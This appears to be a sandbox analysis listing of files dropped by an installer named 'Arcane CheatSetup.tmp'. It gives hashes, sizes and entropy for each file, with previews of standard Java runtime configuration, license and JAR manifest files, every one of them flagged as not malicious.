                                Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="false">.. <or>.. <test name="
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):33932
                                Entropy (8bit):7.930702746433849
                                Encrypted:false
                                SSDEEP:768:xYJfTGikW6VajSe/SA5vN9kqizE48ojVxQYuW+t:xY5TpkK/nFNIzptjVxYHt
                                MD5:C401E00A5DE0DD9723885CEF9E2F5A44
                                SHA1:B6735B93811517F062A20869D8A0B57FAEFF6A90
                                SHA-256:C6574F4763696F2A83028DE143D9ED1C975062BA2D44CC5C91558751FB84BCD6
                                SHA-512:595B950AD5BFF930654BF7FB996BA222D19B4F175821AB0FD6EC4F54D4B7D62B37757429051D1302BC438AB76350B4CD0A07BA712CAECC79DCDB0C60494B5AB2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):633957
                                Entropy (8bit):6.018176262975427
                                Encrypted:false
                                SSDEEP:6144:ABoQeW0HKwYGORU+ehqEmke1WEAibVR0GPs4j8GgflXhuuMAjYDTj:Uo40WGdNmpb3DP75
                                MD5:FD1434C81219C385F30B07E33CEF9F30
                                SHA1:0B5EE897864C8605EF69F66DFE1E15729CFCBC59
                                SHA-256:BC3A736E08E68ACE28C68B0621DCCFB76C1063BD28D7BD8FCE7B20E7B7526CC5
                                SHA-512:9A778A3843744F1FABAD960AA22880D37C30B1CAB29E123170D853C9469DC54A81E81A9070E1DE1BF63BA527C332BB2B1F1D872907F3BDCE33A6898A02FEF22D
                                Malicious:false
                                Preview:PK........u..H................META-INF/....PK........u..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4312
                                Entropy (8bit):4.756104846669624
                                Encrypted:false
                                SSDEEP:96:6VprYJmprYJD9Y3t3qFKPG7hLxVJgdTsfbFfcwQoPv:6HrsursD9Y3t36KPG7HyoBQoX
                                MD5:AD91D69A4129D31D72FBE288FF967943
                                SHA1:CB510AFCDBECEA3538C3F841C0440194573DBB65
                                SHA-256:235A50D958FAEDDE808D071705A6D603F97611F568EEC40D7444984B984A4B18
                                SHA-512:600BEE4676D26E2CE5B9171582540021509A4D7888C9C7BADC14F0FAD07007E4CE2B4C007A8EB15BD0D977722B8B34442012EA972FFBD72797475A56CDFD86EE
                                Malicious:false
                                Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2514
                                Entropy (8bit):4.525846572478507
                                Encrypted:false
                                SSDEEP:48:/GXieQT8cg6ZGBjn4stbaWUwO61xFMxO9:OXieW8nBjn4x613Mw9
                                MD5:0AA5D5EFDB4F2B92BEBBEB4160AA808B
                                SHA1:C6F1B311A4D0790AF8C16C1CA9599D043BA99E90
                                SHA-256:A3148336160EA7EF451052D1F435F7C9D96EEB738105AC730358EDADA5BD45A2
                                SHA-512:A52C2B784CF0B01A2AF3066F4BB8E7FD890A86CFD82359A22266341942A25333D4C63BA2C02AA43ADE872357FC9C8BBC60D311B2AF2AD2634D60377A2294AFDD
                                Malicious:false
                                Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):381
                                Entropy (8bit):4.99308306420453
                                Encrypted:false
                                SSDEEP:6:5ji0B4r/Rjiszbdy/oocj+sqX2K5YZ5/CUMQxxi6m4xijgxmzbdGh/4:5ji0GJjiIq1cCvXPA/CUMQxoeocx2K/4
                                MD5:B608D45DCDD7A4CAD6A63A89A002F683
                                SHA1:F6E3BB7050C3B1A3BED9B33122C4A98E6B9A810D
                                SHA-256:52CA96531445B437DCA524CB3714FCD8D70221D37A6B9C80F816713C3040DD0A
                                SHA-512:407E7CA807826F0E41B085BCA0F54F0134E3B9AC16FA5480EDE02774067DAD46AA07D225BA2981DEC2A7297EA57721EAB8C54E8BED83D352EC6C00ABFDBBF626
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3486
                                Entropy (8bit):4.4357861198752975
                                Encrypted:false
                                SSDEEP:48:MlXHR6+76EX0o8KA0Esns+ek2OrRC9AUE4T7AKQi2r8BKS3GpPsDu0cpUxJAJKk3:M9HRb7l0FAEsnJKmS32X00h
                                MD5:9D9EC1BB9E357BBFB72B077E4AF5F63F
                                SHA1:6484B03DBE9687216429D3A6F916773C060E15CE
                                SHA-256:8B02A29BC61B0F7203DF7CA94140F80D2C6A1138064E0441DFD621CF243A0339
                                SHA-512:5FE39BBFCA806CE45871A6223D80FA731EFAA5D31C3B97EE055AB77EAF3833342945F39E9858335D9DD358B4B7F984FFADE741452E19B60B8E510AA74AC02C00
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for SNMP Access Control List File..#..# o Copy this template to snmp.acl..# o Set access control for SNMP support..# o Change the permission of snmp.acl to be read-only..# by the owner...#..# See below for the location of snmp.acl file...# ----------------------------------------------------------------------....############################################################..# SNMP Access Control List File ..############################################################..#..# Default location of this file is $JRE/lib/management/snmp.acl...# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# or by specifying a system property (See that file for details)...#......##############################################################..# File permissions of the snmp.acl file..######################
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4077
                                Entropy (8bit):4.472483528668558
                                Encrypted:false
                                SSDEEP:96:eii7cSoFKfgCe/D4dtQN+wvohSoVGPbPvRZUIpeDMy:eiiISokfXeEk+wQhnMPbnRZR7y
                                MD5:41B36D832BE39A3CF0F3D7760E55FDCB
                                SHA1:E706E9BE75604A13DFCC5A96B1720A544D76348B
                                SHA-256:71A930CBE577CBABB4269650C98D227F739E0D4B9C0B44830DD3D52F5015BE1F
                                SHA-512:41E6B8639C1CEB3D09D2FDEEEBA89FFA17C4ED8B1AD0DF1E5AB46C4BF178688D5504DC5A3C854226F7DA23DFA0EDAB0D035D6B56495829F43AAA2A7BABEC4273
                                Malicious:false
                                Preview:######################################################################..# Default Access Control File for Remote JMX(TM) Monitoring..######################################################################..#..# Access control file for Remote JMX API access to monitoring...# This file defines the allowed access for different roles. The..# password file (jmxremote.password by default) defines the roles and their..# passwords. To be functional, a role must have an entry in..# both the password and the access files...#..# The default location of this file is $JRE/lib/management/jmxremote.access..# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# (See that file for details)..#..# The file format for password and access files is syntactically the same..# as the Properties file format. The syntax is described in the Javadoc..# for java.util.Properties.load...# A typical access file has multiple
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2920
                                Entropy (8bit):4.545881645777106
                                Encrypted:false
                                SSDEEP:48:MRSflLrmpop7JN/PgP8KAeoYsnZyhNMVJKWfVStEqwP0pba:Mkv7ngUZYsnRnfYdhE
                                MD5:5DD28AAF5A06C946DF7B223F33482FDF
                                SHA1:D09118D402CA3BA625B165ECACE863466D7F4CE9
                                SHA-256:24674176A4C0E5EEFB9285691764EA06585D90BBDAF5BF40C4220DE7CA3E3175
                                SHA-512:13C6F37E969A5AECE2B2F938FA8EBF6A72C0C173678A026E77C35871E4AE89404585FB1A3516AE2CA336FC47EAB1F3DD2009123ADBA9C437CD76BA654401CBDF
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for jmxremote.password..#..# o Copy this template to jmxremote.password..# o Set the user/password entries in jmxremote.password..# o Change the permission of jmxremote.password to read-only..# by the owner...#..# See below for the location of jmxremote.password file...# ----------------------------------------------------------------------....##############################################################..# Password File for Remote JMX Monitoring..##############################################################..#..# Password file for Remote JMX API access to monitoring. This..# file defines the different roles and their passwords. The access..# control file (jmxremote.access by default) defines the allowed..# access for each role. To be functional, a role must have an entry..# in both the password and the access files...#..# Default location of this file is $JRE/lib/management/jmx
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14415
                                Entropy (8bit):4.623139916889837
                                Encrypted:false
                                SSDEEP:192:PLrOKIXaIr8Jzc90OEqfmdbHHHN6pDIdpgzri:PLrOKIXaIgYiOE0mdbHHHNGD4p0+
                                MD5:054E093240388F0322604619EF643F18
                                SHA1:6E110C2A5D813013E9C57700BE8B0D17896E950C
                                SHA-256:BF41D73EAB0DA8222FE24255E1BBF68327FB02B1A4F1E7A81B9C7B539033FFB2
                                SHA-512:BD60C6271CDEFFFF4563E6E2CF97C176D86F160092D1FFCBE7EEFE714BA75DDC5FB4E848A5FDBE7A1D1510720D92AF6A176A76DE2CC599F27E4BEAE8E692C5D3
                                Malicious:false
                                Preview:#####################################################################..#.Default Configuration File for Java Platform Management..#####################################################################..#..# The Management Configuration file (in java.util.Properties format)..# will be read if one of the following system properties is set:..# -Dcom.sun.management.jmxremote.port=<port-number>..# or -Dcom.sun.management.snmp.port=<port-number>..# or -Dcom.sun.management.config.file=<this-file>..#..# The default Management Configuration file is:..#..# $JRE/lib/management/management.properties..#..# Another location for the Management Configuration File can be specified..# by the following property on the Java command line:..#..# -Dcom.sun.management.config.file=<this-file>..#..# If -Dcom.sun.management.config.file=<this-file> is set, the port..# number for the management agent can be specified in the config file..# using the following lines:..#..# ################ Management Agen
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2126
                                Entropy (8bit):4.970874214349507
                                Encrypted:false
                                SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                MD5:91AA6EA7320140F30379F758D626E59D
                                SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):4.858724831876285
                                Encrypted:false
                                SSDEEP:48:VBnTRxiW1nTbXMROXX6zcjd6vEzcoZDTzcj8L0zccfbb6wB:VBnvisPMQ6z+zPVzv0zVfvT
                                MD5:1CBB261944925044B1EE119DC0563D05
                                SHA1:05F2F63047F4D82F37DFA59153309E53CAA4675C
                                SHA-256:5BAF75BDD504B2C80FF5B98F929A16B04E9CB06AA8AAE30C144B5B40FEBE0906
                                SHA-512:C964A92BE25BACF11D20B61365930CAB28517D164D9AE4997651E2B715AA65628E45FA4BD236CCD507C65E5D85A470FD165F207F446186D22AE4BD46A04006E6
                                Malicious:false
                                Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1012097
                                Entropy (8bit):7.896417877823185
                                Encrypted:false
                                SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                MD5:54EF6C22FAAAE5850091031763078D37
                                SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                Malicious:false
                                Preview:PK........!..H................META-INF/....PK........ ..H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/uitoolkit/PK...........H................com/sun/deploy/uitoolkit/impl/PK........!..H............"...com/sun/deploy/uitoolkit/impl/awt/PK...........H............#...com/sun/deploy/uitoolkit/impl/text/PK...........H................com/sun/deploy/uitoolkit/ui/PK...........H................com/sun/java/PK...........H................com/sun/java/browser/PK...........H................com/sun/java/browser/plugin2/PK...........H............)...com/sun/java/browser/plugin2/liveconnect/PK...........H............,...com/sun/java/browser/plugin2/liveconnect/v1/PK...........H................netscape/PK...........H................netscape/javascript/PK.........
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2915
                                Entropy (8bit):5.2172692442941075
                                Encrypted:false
                                SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                MD5:A38587427E422D55B012FA3E5C9436D2
                                SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10716
                                Entropy (8bit):5.016037435830914
                                Encrypted:false
                                SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3490933
                                Entropy (8bit):6.067002853185717
                                Encrypted:false
                                SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                MD5:9A084B91667E7437574236CD27B7C688
                                SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK...........H..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif.
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):63602929
                                Entropy (8bit):5.963369315504544
                                Encrypted:false
                                SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.5.%...%.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bean
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3026
                                Entropy (8bit):7.48902128028383
                                Encrypted:false
                                SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4149
                                Entropy (8bit):5.816047466650347
                                Encrypted:false
                                SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                Malicious:false
                                Preview:# JNLPAppletLauncher applet-launcher.jar
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1273
                                Entropy (8bit):4.167014768533289
                                Encrypted:false
                                SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                MD5:BBEBCF13680E71EC2EE562524DA02660
                                SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                Malicious:false
                                Preview:Algorithm
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java KeyStore
                                Category:dropped
                                Size (bytes):112860
                                Entropy (8bit):7.58405956263152
                                Encrypted:false
                                SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                MD5:A2C167C8E0F275B234CB2C2E943781C7
                                SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3527
                                Entropy (8bit):7.521709350514316
                                Encrypted:false
                                SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                MD5:57AAAA3176DC28FC554EF0906D01041A
                                SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2515
                                Entropy (8bit):4.490054643169131
                                Encrypted:false
                                SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                MD5:EC90FD04C2890584A16EB24664050C2A
                                SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                Malicious:false
